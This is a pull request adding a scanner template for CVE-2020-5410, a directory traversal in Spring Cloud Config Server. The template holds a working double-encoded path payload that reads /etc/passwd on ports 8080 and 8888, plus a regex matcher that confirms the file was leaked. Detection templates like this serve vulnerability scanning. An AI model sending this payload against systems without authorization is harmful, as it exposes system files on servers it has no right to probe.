### PR TITLE
Add directory traversal CVE-2020-5410 affecting Spring Cloud Config 

### DIFF
--- a/cves/CVE-2020-5410.yaml
+++ b/cves/CVE-2020-5410.yaml
@@ -1,0 +1,20 @@
+id: CVE-2020-5410
+
+info:
+  name: Directory Traversal in Spring Cloud Config Server
+  author: mavericknerd
+  severity: high
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}:8080/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
+      - "{{BaseURL}}:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+        part: body


### PR DESCRIPTION
Verified locally that CVE works on the effected version.

Spring Cloud server by default runs on port 8080 but in the wild developers tend to configure it on port 8888 also as mentioned here: https://cloud.spring.io/spring-cloud-config/multi/multi__spring_cloud_config_server.html

https://tanzu.vmware.com/security/cve-2020-5410

POC: https://github.com/osamahamad/CVE-2020-5410-POC/blob/master/README.md